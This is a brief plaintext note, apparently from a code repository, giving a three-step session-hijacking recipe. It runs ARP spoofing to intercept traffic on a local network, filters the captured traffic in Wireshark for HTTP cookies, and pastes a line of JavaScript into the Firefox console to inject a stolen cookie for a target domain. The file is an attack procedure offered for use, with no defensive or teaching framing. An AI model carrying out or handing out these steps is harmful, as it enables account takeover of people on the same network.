Files

17 lines
182 B
Plaintext
Raw Permalink Normal View History

run arpspoofing
run wireshark and filter "http.cookie"
run in console firefox for inject cookie:
document.cookie = "sniffing cookie; domain=.domain.com; path=/; Secure";